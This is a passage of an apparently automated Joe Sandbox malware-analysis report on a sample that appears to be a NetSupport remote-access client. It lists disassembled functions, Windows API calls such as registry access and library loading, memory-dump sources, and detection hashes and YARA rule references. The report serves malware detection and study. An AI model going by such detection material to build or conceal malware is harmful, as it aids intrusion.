                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DriveType
                                                                                        • String ID: ?:\
                                                                                        • API String ID: 338552980-2533537817
                                                                                        • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                        • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                        • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                        • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                        Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                        • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                          • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                        Strings
                                                                                        • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenwvsprintf
                                                                                        • String ID: Error %d Opening regkey %s
                                                                                        • API String ID: 1772833024-3994271378
                                                                                        • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                        • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                        • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                        • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                        Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                          • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                        Strings
                                                                                        • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Closewvsprintf
                                                                                        • String ID: Error %d closing regkey %x
                                                                                        • API String ID: 843752472-892920262
                                                                                        • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                        • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                        • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                        • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                        Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,02B4B870,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                          • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HandleLibraryLoadModule
                                                                                        • String ID: NSMTRACE
                                                                                        • API String ID: 4133054770-4175627554
                                                                                        • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                        • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                        • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                        • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                        Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: psapi.dll
                                                                                        • API String ID: 1029625771-80456845
                                                                                        • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                        • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                        • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                        • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                        Function 11014F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: nslsp.dll
                                                                                        • API String ID: 1029625771-3933918195
                                                                                        • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                        • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                        • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                        • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                        Function 11074DC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 11074E1F
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1654520187-0
                                                                                        • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                        • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                        • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                        • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                        Function 1105FCF0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1338273076-0
                                                                                        • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                        • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                        • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                        • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                        Function 1105EC90 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1183979061-0
                                                                                        • Opcode ID: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
                                                                                        • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                        • Opcode Fuzzy Hash: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
                                                                                        • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                        Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 110883EF
                                                                                        • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection_memset
                                                                                        • String ID:
                                                                                        • API String ID: 453477542-0
                                                                                        • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                        • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                        • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                        • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                        Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                        • ExtractIconExA.SHELL32(?,00000000,001B0269,0005041D,00000001), ref: 11144498
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExtractFileIconModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 3911389742-0
                                                                                        • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                        • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                        • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                        • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
